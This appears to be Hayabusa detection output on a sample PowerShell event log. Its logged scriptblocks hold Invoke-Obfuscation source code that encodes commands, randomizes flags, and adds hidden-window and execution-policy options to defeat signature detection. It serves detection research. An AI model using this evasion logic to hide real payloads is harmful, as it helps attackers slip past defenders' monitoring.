{Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProf -NonIn ""${ }= + $() ; ${ }=${ };${ } = ++ ${ }; ${ }=++${ } ;${ }=++${ };${ } =++ ${ } ; ${ } = ++${ };${ } =++ ${ } ; ${ }= ++${ } ;${ } = ++ ${ } ; ${ }=++ ${ } ;${ }=\""[\""+ \""$( @{ } ) \""[ ${ }]+\""$(@{ })\""[\""${ }${ }\""]+ \""$( @{ } ) \""[\""${ }${ }\""]+ \""$?\""[${ } ] + \""]\"" ;${ } = \""\"".(\""$( @{ } ) \""[\""${ }${ }\"" ] + \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[${ }] +\""$( @{ } ) \""[${ } ]+ \""$?\""[${ } ] +\""$( @{ } ) \""[${ }] ) ; ${ }= \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[ ${ }] +\""${ }\""[ \""${ }${ }\""] ; & ${ }( \"" ${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }+ ${ 
}${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }^|${ } \"" )"" C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ${%``*} = +$() ; ${(\$}=${%``*} ; ${ *}=++ ${%``*};${$)(} = ++${%``*};${ } =++${%``*};${,+]}= ++ ${%``*} ; ${,} =++ ${%``*}; ${!``@} =++${%``*} ;${.} = ++ ${%``*}; ${]\}=++ ${%``*} ;${+}=++${%``*} ;${,-\}=""[""+""$(@{})""[${.}]+ ""$(@{})""[""${ *}${+}"" ]+""$(@{})""[""${$)(}${(\$}"" ] +""$?""[ ${ *}]+ ""]"";${%``*} = """".(""$(@{})""[ ""${ *}${,+]}"" ] +""$(@{})""[""${ *}${!``@}"" ]+ ""$(@{})""[${(\$} ] + ""$(@{})""[ ${,+]}]+ ""$?""[ ${ *}]+""$(@{})""[${ } ] ) ; ${%``*} = ""$(@{})""[""${ *}${,+]}""]+ ""$(@{})""[${,+]}]+ ""${%``*}""[""${$)(}${.}""] ;"" ${%``*} (${,-\}${]\}${.}+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@}+${,-\}${ *}${(\$}${ *} + ${,-\}${,+]}${,}+ ${,-\}${.}${$)(} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,}+${,-\}${ *}${ *}${!``@}+ ${,-\}${ }${$)(}+${,-\}${ }${+} +${,-\}${.}${$)(}+${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+${,-\}${ }${$)(}+ ${,-\}${]\}${.}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]} +${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${(\$}+ ${,-\}${ }${ } +${,-\}${ }${+} + ${,-\}${ }${$)(}+ ${,-\}${,+]}${,} +${,-\}${.}${(\$} + ${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *}+${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.}+${,-\}${ *}${ *}${(\$}+ ${,-\}${ *}${(\$}${(\$} +${,-\}${!``@}${.} +${,-\}${ *}${ *}${ *} + ${,-\}${ 
*}${(\$}${]\} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${,+]}+${,-\}${ }${$)(} +${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *} + ${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} + ${,-\}${,}${+}+ ${,-\}${ }${$)(} +${,-\}${]\}${.} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@} +${,-\}${ *}${(\$}${ *}+${,-\}${,+]}${,}+${,-\}${.}${$)(}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,}+ ${,-\}${ *}${ *}${!``@} + ${,-\}${ }${$)(} +${,-\}${ }${+}+ ${,-\}${.}${+}+ ${,-\}${+}${]\} +${,-\}${ *}${(\$}${$)(} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${,} +${,-\}${+}${+}+${,-\}${+}${.} +${,-\}${ *}${ *}${!``@}+ ${,-\}${ *}${(\$}${,} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${(\$}+${,-\}${ }${$)(}+ ${,-\}${]\}${$)(} +${,-\}${ *}${ *}${ *} +${,-\}${+}${+}+${,-\}${ *}${(\$}${.} +${,-\}${ *}${ *}${,}+ ${,-\}${ }${ } +${,-\}${ }${+}+ ${,-\}${ }${$)(} + ${,-\}${,+]}${,} + ${,-\}${.}${(\$}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${(\$}+${,-\}${ *}${(\$}${(\$}+${,-\}${!``@}${.}+ ${,-\}${ *}${ *}${ *}+${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,+]} +${,-\}${ }${$)(}+ ${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} )""| .${%``*} .NOTES All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Build out variables to obtain 0-9, ""[char]"" and ""iex"" $VariableInstantiationSyntax = @() $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ++ ${;} ; ${.} = ++ ${;} ; ${[} = ++ ${;} ; ${]} = ++ ${;} ; ${(} = ++ ${;} ; ${)} = ++ ${;} ; ${&} = ++ ${;} ; ${|} = ++ ${;} ; ' $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ( ${;} = ${;} + ${+} ) ; ${.} = ( ${;} = ${;} + ${+} ) ; ${[} = ( ${;} = ${;} + ${+} ) ; ${]} = ( ${;} = ${;} + ${+} ) ; ${(} = ( ${;} = ${;} + ${+} ) ; ${)} = ( ${;} = ${;} + ${+} ) ; ${&} = ( ${;} = ${;} + ${+} ) ; ${|} = ( ${;} = ${;} + ${+} ) ; ' $VariableInstantiation = (Get-Random -Input $VariableInstantiationSyntax) ${[Char]} = '${""} = \""[\"" + \""$( @{ } ) \""[ ${)} ] + \""$(@{ })\""[ \""${+}${|}\"" ] + \""$( @{ } ) \""[ \""${@}${=}\"" ] + \""$? 
\""[ ${+} ] + \""]\"" ; ' $OverloadDefinitions = '${;} = \""\"".(\""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ \""${+}${(}\"" ] + \""$( @{ } ) \""[ ${=} ] + \""$( @{ } ) \""[ ${[} ] + \""$? \""[ ${+} ] + \""$( @{ } ) \""[ ${.} ] ) ; ' $Iex = '${;} = \""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ ${[} ] + \""${;}\""[ \""${@}${)}\"" ] ; ' # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { ${[Char]} = ${[Char]}.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $OverloadDefinitions = $OverloadDefinitions.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $Iex = $Iex.Replace('}${','}\"" + \""${') } # Combine above setup commands. $SetupCommand = $VariableInstantiation + ${[Char]} + $OverloadDefinitions + $Iex # 1/2 of the time choose 'char' | % syntax where only one ';' is needed in the entire command. # 1/2 of the time choose simpler ';' delimiter for each command. If((Get-Random -Input @(0..1))) { # Do not add ':' '?' '>' '<' '|' '&' ':' '^' ""'"" ',' or ' ' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','_','/','\','*','%','$','#','!','``','~') # 1/3 of the time randomly choose using only one random character from above. 
# 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. Switch(Get-Random -Input @(1..3)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $RandomString = $RandomChar*(Get-Random -Input @(1..6))} default {$RandomString = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..3)))} } # Replace default syntax for multiple commands (using ';') with the syntax of 'char' | % $SetupCommand = '( ' + ""'$RandomString'"" + ' | % { ' + $SetupCommand.Replace(' ; ',' } { ').Trim(' {') + ' ) ; ' } # Convert $ScriptString into a character array and then convert each character into ASCII integer representations substituted with our special character variables for each character. $CharEncoded = ([Char[]]$ScriptString | ForEach-Object {'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}) -Join ' + ' # Randomly choose between . and & invocation operators. $InvocationSyntax = (Get-Random -Input @('.','&')) # Select random ordering for both layers of ""iex"" $CharEncodedSyntax = @() $CharEncodedSyntax += '\"" ' + $CharEncoded + ' ^| ${;} \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += '\"" ${;} ( ' + $CharEncoded + ' ) \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ' + $CharEncoded + ' ^| ${;} \"" ) ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ${;} ( ' + $CharEncoded + ' ) \"" ) ' # Randomly select one of the above commands. $CharEncodedRandom = (Get-Random -Input $CharEncodedSyntax) # Combine variable instantion $SetupCommand and our encoded command. $NewScriptTemp = $SetupCommand + $CharEncodedRandom # Insert random whitespace. 
$NewScript = '' $NewScriptTemp.Split(' ') | ForEach-Object { $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) } # Substitute existing character placement with randomized variables names consisting of randomly selected special characters. $DefaultCharacters = @(';','=','+','@','.','[',']','(',')','&','|','""') # Do not add ':' '?' '>' '<' '|' '&' ':' '_' ',' or '^' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','/',""'"",'*','%','$','#','!','``','~',' ') # 1/3 of the time randomly choose using only one random character from above or using only whitespace for variable names. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. $UpperLimit = 1 Switch(Get-Random -Input @(1..6)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $NewCharacters = @(1..12) | ForEach-Object {$RandomChar*$_}} 2 {$NewCharacters = @(1..12) | ForEach-Object {' '*$_}} default {$UpperLimit = 3} } $NewVariableList = @() While($NewVariableList.Count -lt $DefaultCharacters.Count) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' While($NewVariableList -Contains $CurrentVariable) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' } $NewVariableList += $CurrentVariable } # Select 10 random new variable names and substitute the existing special characters in $NewScript. $NewCharactersRandomOrder = Get-Random -Input $NewCharacters -Count $DefaultCharacters.Count For($i=0; $i -lt $DefaultCharacters.Count; $i++) { $NewScript = $NewScript.Replace(('${' + $DefaultCharacters[$i] + '}'),('${' + $i + '}')) } For($i=$DefaultCharacters.Count-1; $i -ge 0; $i--) { $NewScript = $NewScript.Replace(('${' + $i + '}'),('${' + $NewVariableList[$i]+'}')) } # Remove certain escaping if PassThru is selected. 
If($PSBoundParameters['PassThru']) { If($NewScript.Contains('\""')) { $NewScript = $NewScript.Replace('\""','""') } If($NewScript.Contains('^|')) { $NewScript",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.279 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.280 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"= $NewScript.Replace('^|','|') } } # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.280 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"= $NewScript.Replace('^|','|') } } # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.280 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedWhitespaceCommand { <# .SYNOPSIS Generates Whitespace encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedWhitespaceCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedWhitespaceCommand encodes an input PowerShell scriptblock or path as a Whitespace-and-Tab encoded payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. 
.PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoP -NonInterac ""' '|%{$uXOrcSp= $_ -CSplIt ' ' | %{' ' ; $_ -CSplIt ' ' |% { $_.lEngth- 1}} ; .( 